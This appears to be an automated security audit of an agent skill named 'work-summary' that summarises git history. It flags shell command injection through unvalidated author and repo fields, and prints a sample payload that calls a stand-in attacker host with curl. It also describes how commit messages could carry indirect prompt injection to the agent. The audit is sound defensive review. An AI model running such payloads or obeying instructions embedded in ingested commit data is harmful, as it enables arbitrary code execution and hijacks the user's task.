work-summary
Fail
Audited by Gen Agent Trust Hub on Mar 21, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructions direct the agent to execute shell commands using unvalidated user input for repository paths and author names. Specifically, the command
cd <repo> && git log --author="<author>" ...allows an attacker to inject shell metacharacters. A malicious input like; curl http://attacker.com/$(whoami) #in the repo or author field would lead to arbitrary command execution on the host system. - [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection due to its processing of external, untrusted commit history.
- Ingestion points: Commit messages and repository data are ingested via
git logcommands in SKILL.md. - Boundary markers: The instructions do not specify any delimiters or safety markers to differentiate between the agent's instructions and the content of the commit messages.
- Capability inventory: The agent has the ability to execute shell commands, read filesystem paths, and generate structured summaries based on the ingested content.
- Sanitization: No sanitization or escaping is performed on the commit messages before the agent is asked to group and categorize them, allowing embedded malicious instructions within a commit to potentially influence the agent's logic.
Recommendations
- AI detected serious security threats
Audit Metadata